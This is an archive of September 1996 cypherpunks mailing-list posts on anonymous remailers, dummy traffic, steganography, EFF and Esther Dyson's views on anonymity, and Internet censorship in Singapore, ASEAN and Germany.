Message-ID: <19960904203437.2587.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Subject: How to send bogus mail to mislead traffic analysis?

Hi

How can I send messages to remailer so that they will get lost?
I want to generate a more or less steady flow of remailer-processed, encrypted mail.

Can I send to nobody@some_remailer.net?  
What are the guidelines for that?
What are the best remailers to send to?

Cheers

Bugged

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAjItXH4AAAEEAL7znlceWxOboMgS5TJykI0LvxZ+nRwaUle05LyGdbQK8Tbv
cnFb945OgUMxlWb+xpwYKpZIaZRJME86aO5OvMAI8IN5AQv1zx/e1v+l/6G8QyWN
kRqtIxA++WlPO0co9DbckmED7IhtMabIto9S5vH7m6UzH/ASLE/d3JIQvo5FAAUR
tAZCdWdnZWSJAJUCBRAyLVzhT93ckhC+jkUBAYnsA/9WGCWZvZXRibOs6Be9roWX
fgTGhDl0rZhH13D5n7O77uQfAMCYf9ALbfn9UkbnMnAGtDyecPTp9TC3Ha65TkWv
ald2LoLvMD01d6iS8SkvedcgHqojfh/Q55NkJ0wtO/Ne0jOtFVQzDEtF7awwypAx
HZgIoEMsSLDrTT0EwTlTjg==
=mlIT
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMi1g10/d3JIQvo5FAQE70wQAsVZzVT9MrP5TuKcilJaehufve5O56B4y
0y5vaeax5fAAElZz9SxRV+meAgUNvRNTUu1afZIHYzoFUdJWoSAroLxMjSqbv1uT
O95Qur+jJRLwgDoo+Kgse8DESDqlGdI2kab6KxDrSz2erkARYn9A5/JQTTI/L3I5
z1eW2fBec9c=
=kDXU
-----END PGP SIGNATURE-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Steinke <cjs@cinenet.net>
Date: Thu, 5 Sep 1996 11:49:42 +0800
To: cypher@infinity.nus.sg
Subject: cypherpunks
Message-ID: <322E4DFA.167E@cinenet.net>
MIME-Version: 1.0
Content-Type: text/plain


subscribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Fidell <james@corp.netcom.net.uk>
Date: Thu, 5 Sep 1996 07:28:39 +0800
To: jf_avon@citenet.net
Subject: Re: Letter to the Observer [re: Internet paedophile]
In-Reply-To: <9609041639.AA25461@cti02.citenet.net>
Message-ID: <199609041954.UAA04906@corp.netcom.net.uk>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois Avon wrote:

> On  4 Sep 96 at 5:41, Martin Minow wrote:
> 
> > Forwarded to me by a friend:
> 
> > The following letters were delivered to the Editor of the Observer
> > last week as a request to publish a retraction of their article
> > relating to the Internet that appeared on Sunday 25th. August.
> 
> One way to limit or retaliate against diffamation would be to refuse 
> internet access to anybody known to be part of any such medias, being 
> tv or paper.
> 
> ISPs would probably easily agree since the revenues coming from
> journalists vs from the general population is probably minuscule. Of
> course, the conventionnal media would set up their own ISP but they
> could be identified.
> 
> Does that makes sense or am I out to lunch?

I don't think it makes sense.  The media would be the first to
point the finger at the ISPs for censorship in such a case, one
imagines (whether it could be justified or not is a different matter
of course).

James.
-- 
 "Yield to temptation --             | Work: james@corp.netcom.net.uk
  it may not pass your way again"    | Play: james@hermione.demon.co.uk
                                     | http://www.netcom.net.uk/~james/
        - Lazarus Long               |              James Fidell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 5 Sep 1996 08:20:58 +0800
To: cypherpunks@toad.com
Subject: SG Spy Ring
Message-ID: <199609042056.UAA18784@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, September 4, 1996, p. 4. 
 
 
   Singapore looks to superhighway 
 
   By James Kynge in Kuala Lumpur 
 
 
   Singapore took another step toward its vision of becoming 
   an "intelligent island" yesterday, announcing an initiative 
   to link the city-state's main on-line networks. 
 
   Mr Goh Chee Wee, Singapore's minister of state for 
   communications, said the "internetwork hub" would link 
   service providers of the Internet, government on-line 
   networks, commercial networks and some others. 
 
   Singapore's move follows an ambitious scheme announced by 
   neighbour Malaysia last month to launch an "information 
   superhighway" designed to attract the world's leading 
   information technology companies to Kuala Lumpur. 
 
   The perceived advantage in Singapore's initiative is that 
   users will be able to access all networks using a single 
   leased line, rather than the separate lines currently 
   necessary. 
 
   The hub will use a single set of national standards, 
   meaning inter-operability between networks becomes easier. 
 
   Mr Goh said the hub should be up and running by the end of 
   the year. A mechanism to identify users electronically 
   would be incorporated into the hub network next year, 
   paving the way for secure operations such as payments, 
   banking and confidential correspondence. 
 
   The move is part of the Information Technology 2000 
   masterplan, a scheme which aims to accomplish the sometimes 
   conflicting aims of exploiting the information superhighway 
   to its full potential while continuing to insulate 
   Singaporeans from undesired influences. 
 
   From September 15, the city-state will implement its first 
   big attempt to police cyberspace. From then all Internet 
   providers must channel more than 120,000 subscribers on the 
   island through "proxy servers" before they reach the net. 
 
   These servers will check every Internet site a subscriber 
   requests and block access to a about a dozen banned sites 
   known to display pornography. The government has warned 
   against material deemed politically subversive or inciting 
   religious disharmony. 
 
   [End] 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 5 Sep 1996 07:51:03 +0800
To: mech@eff.org
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609031904.MAA23619@eff.org>
Message-ID: <199609042000.VAA00708@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Stanton McCandlish <mech@eff.org> writes on cpunks:
> [again, since I'm not on the CP list these days, feel free to bounce this 
> over to the list if it doesn't make it. I'm not sure what the 
> non-subscriber posting policy is and/or whether such attempted posts are 
> filtered out, though I seem to recall they didn't used to be.]

Cypherpunks always has been and remains an open list.  You shouldn't
need to wonder given cypherpunk views on free speech :-)

> Black Unicorn <unicorn@schloss.li> writes:
> > enough with its own policy to prevent its staff and board from making
> > embarassing big brother type proposals to curtail the ability of any of us
> > to post without attributation would be an alternative.  I think an
> 
> In other words you propose an alternate EFF that censors its own
> boardmembers.

No.  But I too am rather suprised to hear an EFF board member
apparently speaking against free speech.  OK, so maybe she was
mis-quoted so I wait for her rebuttal, but nope, she basically to my
reading reiterates nothing but negative opinions on free speech and
anonymity.

Tim's quotes of her CFP speech further demonstrates her leanings.

> I'm not aware of any logical consistency that could adhere to an 
> organization that simultaneously says it supports free speech, yet 
> demands that its board of directors never speak except in agreement with 
> the organization's policy.  You are asking for a mini-dictatorship.  EFF 
> has no position on anonymity.  We also have no position on abortion or on 
> whether roast duck is better than fried chicken. You are in essence 
> demanding that EFF impeach any boardmember that offers an opinion in 
> public or in private about whether or not chicken is good stuff, or states
> a belief about right to choose v. right to life positions.  
> 
> I'm sorry that we are not totalitarian enough for you.

Lets put it this way: if Louis Freeh offered to be an EFF board
member, would you take him on board?  If he seemed quite
pro-anonymity, and free speech, and later turned out to be having
doubts, would you keep him?

Ie if her views are proving a liability for EFFs reputation, perhaps
you all ought to get together and see if you can work something out?

Anonymity is a pretty darn major issue here, so it'd be really sad to
see EFF coming down on the wrong side.  I've seen some of the other
EFF insiders own opinions, and would like to see them adopted in place
of Dyson's views, which whether they are her opinion or not, are more
likely to get misrepresented by the press as such, in face of a lack
of an EFF position.  EPICs statement looked a reasonable start.

> Incidentally, Dyson made no such proposal as you refer to, but simply 
> expressed questions and doubts about the misuse of anonymity, and made a 
> clear and correct statement of fact ("you need to be able to get at 
> somebody's identity to enforce accountability") without offering any 
> value judgement about whether that was a good idea. 

She sounded pretty anti-anonymity to me.

Are there a shortage of political and net-aware libertarians for board
candidates or something?

> She concluded that "the question is how do you also enforce freedom
> of speech and freedom from prosecution for unpopular opinions,"
> clearly indicating at least as much doubt about the value of any
> attempt to force identifiability and accountability.  Even Dyson's
> lead statement that "the damage that can be done by anonymity is far
> bigger" online that offline is factually correct, and does not
> consist of any kind of value judgement. It's simply an honest and,
> IMNERHO, necessary observation.

Perhaps the quote was unfortunate, perhaps she has also said
pro-anonymity things.  But a person who is pro-anonymity would surely
try to emphasise the pro arguments also?  The material I have seen so
far does not seem to indicate that this is the case.

If this is the case she needs to be _much_ more careful about what she
says in `personal' interviews.

> If we lie to the public, or lie to ourselves, we lose, because the
> opposition will have arguements we have not even looked at much less
> wrestled with.
> 
> I'm sorry we are not self-delusional and dishonest enough for you.

Be sure to express the pro-anonymity arguments while you're zealously
hammering out every last thing that can go wrong with anonymity: like
that free speech is not possible with out it.  It's pretty much all or
nothing, either you think free speech is worth the risk, or you prefer
big brother, government access to keys, the works.

[see http://www.c2.org/~winsock/ for a windows remailer]

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: makof@alias.cyberpass.net (makofi)
Date: Thu, 5 Sep 1996 15:40:14 +0800
To: cypherpunks@toad.com
Subject: Re: Steganography -- Tell Tale Signs?
Message-ID: <199609050421.VAA21428@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi there!

I'd appreciate some help from you experts in 
steganography.

1) If I hide some PGP encrypted data in a
gif, jpg or wav file will there be any tell tale 
signs to the naked eye of an expert? If yes,
what are they?

2) Would it better to hide the data in 
a jpg with black and white image rather
than a color one?

3) Are there any tools at the moment 
to expose (not crack) the hidden encrypted 
data? If none. are there tools in development?

If this is off-topic please accept my apologies. 
and if necessary, please email replies to me 
directly. Thank you.

Makofi



 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 5 Sep 1996 13:19:54 +0800
To: cypherpunks@toad.com
Subject: Re: How to send bogus mail to mislead traffic analysis?
In-Reply-To: <19960904203437.2587.qmail@squirrel.owl.de>
Message-ID: <9609050225.AA00649@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


an anonymous squirrel wrote:
>  How can I send messages to remailer so that they will get
>  lost? I want to generate a more or less steady flow of
>  remailer-processed, encrypted mail.

The single best way to generate a steady flow of encrypted  
remailer-processed mail for the purpose of disguising your own personal  
remail is to operate a publicly accessible remailer from your own account.   
This offers many advantages:

1. encrypted remail is (more or less, depending on traffic) constantly  
flowing from your account:  the addition of your own remail traffic will not  
raise any more flags.

2. there is always at least one remailer in your chain you can trust: yours.  
 This means you never have to worry about compromised remailers.

3. if your mailings are traced back to your account, operating a remailer  
gives you more 'plausible deniability' than if you weren't...

4. if remailers start charging for service, you not only would continue to  
enjoy free remailing, but you could possibly make money...

5. you aren't likely to get blacklisted from your own remailer...

6. you get to read the complaints generated by your own messages  (is this  
the cyberspatial equivalent to "doing it just to see their expression"  
......???)

7. you could get your picture on the front-page of a British tabloid...


...to name a few....

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 14:49:09 +0800
To: cypherpunks@toad.com
Subject: Using Compromised Remailers to Get the Goods
Message-ID: <ae53a56e0a021004f420@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 9/4/96, jim bell wrote:

>Perhaps the most ominous part of making "use of encryption to thwart an
>investigation" illegal is _not_ that remailer operators might be prosecuted,
>but that they might NOT be prosecuted in a deal where (in exchange for not
>being prosecuted) they continue to operate the remailer, "cracked" or
>sabotaged so that they share all the info with the cops.  While even that
>won't make chained remailers totally useless, eventually suspicions of such
>a crack will surface, which will help sabotage the credibility of all
>remailers,
>not just the ones that have been "stung."

A very valid concern.

As Jim must be tired of hearing by now, this was brought up a couple of
years ago in discussions about the pressure that could be brought to bear
on remailers.

One suggestion was a duress signal, effectively saying "I have been
compromised." (Also known as a "wave off" in criminal circles.)

The issue of whether a remailer can be trusted to wave off others, via
covert channels, is of course another issue. One can hope that additional
channels will be acquired to produce the necessary information.

(For example, full sender untraceablility means that sources within police
departments can go home, log on with the own PCs, and sell information
about pending investigations, modulo their concerns about pointing to
themselves with information provided (see "canary traps"). What an exciting
world we are entering.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 5 Sep 1996 12:28:50 +0800
To: erehwon@c2.net
Subject: Re: Paladin Publishing suit dismissed
Message-ID: <01I93G9JPMBK9JDJT7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Thank you; my memory isn't the best in the world (obviously).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 5 Sep 1996 14:38:49 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Internet blamed in shoe-cam crimes, assailant free on $750 bail
In-Reply-To: <Pine.LNX.3.94.960904232934.225A-100000@anx0918.slip.appstate.edu>
Message-ID: <Pine.3.89.9609042135.A29446-0100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 4 Sep 1996, The Deviant wrote:
> 
> On Wed, 4 Sep 1996, Declan McCullagh wrote:
> > He said the man was detected by two couples who noticed him moving his
> > foot under the skirt of a woman.  They followed the man, held him and
> > called police.
> > 
> > Police ask women who feel they've been victimized to call 808-5289.
> > 
> > George Walter Campbell, 62, of Cornwall, has been charged with sexual
> > assault and mischief.  He returns to College Park court on Sept. 10.
> > He was released on $750 cash bail yesterday.
> > 
> 
> Hrmm.. I can see how its _wrong_, but exactly how is looking under
> somebodies skirt _assault_?

Why is this wrong? Information wants to be free!

More to the point, boys used to put mirrors on their shoes. Now they 
learn about shoecams on the Net.

Ah, to be young again.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 15:12:11 +0800
To: cypherpunks@toad.com
Subject: Voluntary Disclosure of True Names
Message-ID: <ae53a8ec0c021004c604@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


In a rare moment of lucidity Vladimir Z. Dettweiler wrote:

>I think cpunks should hold the view that communication is a matter
>of mutual consent between sender and receiver. if a receiver says,
>"I don't want any anonymous messages", then should be able to block them.

But this is precisely what nearly all of us have been arguing. Namely, that
the issue of anonymity vs. providing of True Names, is a matter of
_contract_ between parties, not something the government is justified in
sticking its nose into.

Those who wish to not deal with the entities they cannot reliably verify
the True Name of are free to filter them out.

All we are asking is that those of us happy to deal with S. Boxx, Black
Unicorn, PrOduct Cypher, Pablo Escobar, and other pseudospoofing tentacles,
not be told by a government that, for our own good, such communications are
felonies.


>the above is almost exactly what Dyson was saying, and I have been

No, Dyson said "Therefore I would favor allowing anonymity -- with some
form of traceability only under terms considerably stronger than what are
generally required for a wiretap."

This implies a role for government, and concomitant restrictions on related
anonymity technologies, to provide traceability. So much for mutual
agreement between sender and recipient.

(I have nothing against senders and recipients agreeing to use the services
of some third party in providing ultimate traceability. I'm not wild about
the U.S. Government being this third party, paid for by tax money, but so
long as it is not required, it's a minor concern to me. I surmise, though,
that use of the U.S. Government as a third party would not be optional, in
the schemes of Dyson, Denning, and others of that ilk.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 5 Sep 1996 13:05:24 +0800
To: cypherpunks@toad.com
Subject: ASEAN nations generally pro-censorship
Message-ID: <01I93H09FN2O9JDJT7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The interesting "cultural sovereignty" variation on the usual "national
sovereignty" excuse for censorship and other such unethical actions. I'm
reminded of another Asian state that used it... after Tianenmin Square. At
least one member (the Phillipines) is making, at the minimum, lip service for
freedom of speech. US control over them does appear to have done some good.
	-Allen

>     _________________________________________________________________
>   The Peanut Roaster
>     _________________________________________________________________
>                 ASEAN FORUM AGREES ON NEED TO POLICE THE NET
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   SINGAPORE (Sep 4, 1996 11:41 a.m. EDT) - Southeast Asian broadcasters
>   and officials agreed on Wednesday to police the Internet and block off
>   sites that run counter to Asian values.
   
>   A statement issued at the close of the three-day Internet forum in
>   Singapore also said there was a need for nations in the West to
>   understand concerns about the Internet in the region.
   
>   It said the meeting "affirmed the importance of having safeguards
>   against easy access to sites which ran counter to our cherished
>   values, traditions and culture. ASEAN would encourage other nations,
>   especially the West to understand its concern."
   
>   The Association of Southeast Asian Nations (ASEAN) groups Brunei,
>   Malaysia, Singapore, Indonesia, the Philippines, Thailand and Vietnam.
   
>   Earlier this year, ASEAN information ministers met in Singapore to
>   discuss the darker side of the information technology revolution and
>   agreed to set up a regulatory body to oversee the Internet invasion.
   
[...]

>   But the statement suggested there was no agreement on a uniform
>   approach to policing the Internet.
   
>   The ASEAN officials had agreed that regulatory frameworks would depend
>   on each country, and said they would continue to meet regularly "to
>   help each country formulate and fine tune its regulatory approaches,"
>   it said.
   
>   Policing of the Net in ASEAN varies from Singapore's stance of strict
>   controls by licensing only three Internet service providers who have
>   to screen all material accessed by clients.
   
>   Other ASEAN members encourage more self-regulation, and the
>   Philippines says freedom of speech is a critical factor.
   
>   "Political control would not be on the Philippines' agenda," Glenn
>   Sipin, deputy executive director of the Philippines Council for
>   Advanced Science and Technology, told Reuters at the start of the
>   conference.
   
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 5 Sep 1996 12:52:19 +0800
To: cypherpunks@toad.com
Subject: Internet Tax in Tacoma cancelled
Message-ID: <01I93H4Y6YHW9JDJT7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	An excellent case of considering regulatory arbitrage effects.
	-Allen

>     _________________________________________________________________
>   webslingerZ
>     _________________________________________________________________
>         TACOMA, WASH. CITY COUNCIL REPEALS TAX ON INTERNET PROVIDERS
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   TACOMA, Wash. (Sep 4, 1996 01:17 a.m. EDT) - Tacoma City Council
>   members voted Tuesday to exempt Internet service providers from a 6
>   percent telecommunications tax that had attracted nationwide
>   attention.
   
>   With only one dissenting vote, the council approved the exemption at
>   the urging of Mayor Brian Ebersole, who said Tacoma's reputation as a
>   good place to do business outweighed the estimated $200,000 in annual
>   revenue the city stands to lose.
   
>   The tax had been imposed on Internet companies in March by Tacoma's
>   tax and license department as part of a broader levy that affects
>   users of cellular telephones, pagers and other equipment who get
>   billed at addresses within the city, about 30 miles south of Seattle.
   
[...]

>   Tacoma is one of many cities and states who have seized on the rapid
>   growth of the Internet as a potential for raising needed tax revenues.
   
>   West Virginia, Tennessee, Texas, New York and Ohio have similar taxes
>   in place, and California, Florida, New York and Washington state are
>   considering them.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 18:01:37 +0800
To: cypherpunks@toad.com
Subject: Reasons for Preferring Anonymity
Message-ID: <ae53add10e021004ec6c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:41 AM 9/4/96, Jon Lebkowsky wrote:

>The terms "responsibility" and "accountability" are misused, which is
>unfortunate, since I think we'd all argue in favor of taking responsibility
>for our speech/actions in a positive sense. The negative is in asking me to

This issue keeps coming up: "Shouldn't people be willing to take
responsibility for their speech and actions?"

No, actually, and I presented the fact that people are using anonymity and
remailers as evidence that clearly they are not willing to take
responsibility under their own, traceable True Names for their speech.
Q.E.D.

But the issue persist.

Well, why do people use anonymity in general?

* To call the IRS to ask questions. Maybe to ask what they should do if
they haven't paid taxes since 1983. Believe me, with the advent of "Caller
ID" here in California, I've learned to use payphones before calling the
IRS office over in San Jose. (As the Net takes on a larger role, what will
be the parallel to anonymous calls to the IRS? Obvious answer.)

* AIDS test results. And a whole panoply of similar queries. Caller
anonymity is crucial.

* Whistleblowing, obviously.

* Ordering of information and supplies is often done through agents, or
cut-outs. Coca Cola, as the story goes, orders supplies so as to
deliberately confuse those trying to deduce the formula for Coke (probably
a bad example, as the 80-90 years of Coke has probably made the formula for
Coke a kind of joke). But there are very real cases where businesses make
queries or orders and cannot tolerate traceability to them.

(Dyson's thought that maybe anonymity should be banned for businesses shows
her lack of understanding of the issues.)

* As a special form of whistleblowing, sometimes people have information
they feel should be disseminated, and have no desire to be "accountable"
for releasing this information. The release of RC4 code is an example. The
Dumpster diving of Mykotronx is another.

* Admissions and confessions. Those who use the various "recovery" groups
obviously feel no need to ensure "accountability" and "traceability," nor
should they.

* Their comments may affect their Real World jobs, their status in
organizations, their distant future political careers, etc. (In an age of
Web spiders, anything said may show up in future lawsuits, divorce
settlements, tenure reviews, political campaigns, etc.)

And so on.

John L. may wish that all people believe in being held accountable for
their speech and actions, but obviously this demonstrably is not the case.

Names are just another credential, another potential factor in a
transaction. Sometimes they help to close a deal, sometimes they are
unneeded. The notion that a government-issued name credential is necessary
for mutually-satisfactory transactions is just an illusion.

--Tim May (have any of you checked that I am really, truly who I claim to
be? Have you been dealing with me on the basis of belief that I am a
persistent personna, or because you saw me present an SS card?)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 5 Sep 1996 14:16:57 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609042000.VAA00708@server.test.net>
Message-ID: <199609050409.XAA28542@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199609042000.VAA00708@server.test.net>, on 09/04/96 at 09:00 PM,
   Adam Back <aba@dcs.ex.ac.uk> said:

>If this is the case she needs to be _much_ more careful about what she
>says in `personal' interviews.

<sigh>

There seems to be a point being missed in this thread. :(

This was not a 'personal' interview. The paper was not interested in Ms. Dyson's views on anonymity on the internet because she seemed like a nice person. The only reason she was interviewed is because of her position with the EFF as chairwoman.

Ms. Dyson knows this, the reporter knows this, the paper knows this, and so should everyone else.

Under such circumstances this interview should be seen as an 'official' statement from the chairwoman of the EFF. Trying to call this a 'personal' interview and not reflecting 'official' EFF policy is just plain old spin-doctoring. Ms. Dyson should have had more common sense than this.

These statements made by her are akin to the chairman of Philip Morris saying that he believe that cigarette smoke cause cancer but that's just his opinion and not the 'official' company position on it. Who would believe it? How long would he still have his job after making such a statement?

The EFF should make an official statement of their position on this issue and if it is not the same as Ms. Dyson's she should be removed from the board. IMHO this is to important of an issue for the EFF to try to ignore.

- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMi5aMo9Co1n+aLhhAQH+CwQAs/6nRK/jy2vUFIeWhmFIA0xCdf/m2Vgn
SVyzMm6NTx8rVlJiluubkx3Au1t7/lb/KzzZJqt2ocbRUtc0XQUo0TQImqgY06/G
0OAiDYjgddGppUr+42yeHtWXUHK8vhYEgWeSfGS1msnYKchlcqZ16xzDmYVlfize
ncf+FDLd+tE=
=nOVA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Thu, 5 Sep 1996 13:18:53 +0800
To: Cypherpunks@toad.com
Subject: Re:
Message-ID: <199609050231.WAA36740@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Bugged:

> Subject: How to send bogus mail to mislead traffic analysis?
> 
> Hi
> 
> How can I send messages to remailer so that they will get lost?
> I want to generate a more or less steady flow of remailer-processed, encrypted mail.
> 
> Can I send to nobody@some_remailer.net?  
> What are the guidelines for that?
> What are the best remailers to send to?
> 
> Cheers
> 
> Bugged

Set your final destination to "null:", e.g.

==============================
::
Request-Remailing-To: null:

This message gets trashed.
==============================

This works for mixmaster remailers, WinSock Remailer,
and probably most other cypherpunk remailers.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 5 Sep 1996 16:26:43 +0800
To: cypherpunks@toad.com
Subject: German prosecutors redouble attack on Net, subversive leftists
Message-ID: <Pine.3.89.9609042251.A15950-0100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note www.anonymizer.com doesn't seem to be blocked. --Declan]

---

Date: Thu, 5 Sep 1996 01:59:36 +0200 (MET DST)
From: Ulf Moeller <um@c2.net>
To: fight-censorship@vorlon.mit.edu
Subject: German Internet Censorhip: http://www.xs4all.nl

The German Generalbundesanwaltschaft (Chief Federal Prosecutor's
office) has "advised" the Internet providers to block access to
http://www.xs4all.nl:80 and http://www.serve.com:80 due to
supposedly illegal contents at the URLs http://www.serve.com/spg/154/,
http://www.xs4all.nl/~tank/radikal//154/ and
http://ourworld.compuserve.com/homepages/angela1/radilink.htm.

The commercial ISPs have blocked the routes to the servers.
Their statement (in German) is at http://www.anwalt.de/ictf/p960901d.htm

"Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication
from the radical left that is illegal in Germany, but not in
the Netherlands.

---

Date: Wed, 4 Sep 1996 22:15:42 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Re: German Internet Censorhip: http://www.xs4all.nl

I heard about this a few days ago, but I was unable to verify it.

Yesterday I bounced mail through a German university to xs4all.nl back to
EFF, and it came through just fine. I also tried golden-gate.owl.de and
wserver.physnet.uni-hamburg.de, both of which have no problems talking to
xs4all.nl. From those tests, I can say there's no complete ban, though I
can't confirm or deny any partial ban.

However, just in case the German government is successful in this
censorship gambit, I've mirrored the three embattled web sites at: 

  http://www.well.com/~declan/mirrors/

This is a quick grab of the files in question; I'll work on a formatted
intro page later. 

(As background for more recent subscribers to fight-censorship, this isn't
the first time the German government has tried this. A similar move came
early this year when German prosecutors tried to cut connections to
webcom.com in California, where some of Ernst Zundel's Nazi "Holocaust
Revisionist" propaganda was hosted. I and a few other folks including Rich
at Stanford and Blake at Penn held our noses and mirrored it around the
country, prompting the Gemans to lift the ban. I had thought the German
prosecutors smarter than to try this again. I guess I was wrong.)

My global Net-censorship roundup is at:

  http://www.eff.org/~declan/global/

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Thu, 5 Sep 1996 16:01:57 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Voluntary Disclosure of True Names
Message-ID: <199609050545.WAA18030@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About:  4 Sep 96 at 21:48, Timothy C. May wrote:

> In a rare moment of lucidity Vladimir Z. Dettweiler wrote:
> 
> >I think cpunks should hold the view that communication is a matter
> >of mutual consent between sender and receiver. if a receiver says,
> >"I don't want any anonymous messages", then should be able to block them.
> 
> But this is precisely what nearly all of us have been arguing. Namely, that
> the issue of anonymity vs. providing of True Names, is a matter of
> _contract_ between parties, not something the government is justified in
> sticking its nose into.

I always use my true name and am happy to spread it far and wide, but 
I have been doing some work for a GroupWare manufacturer.  They have 
seen that even in a corporate environment where information sharing is 
practised and embraced, sometimes people want to make a comment and 
not take the heat for making that comment.  This can provide some 
constructive input, so they have a anonymous comment feature built 
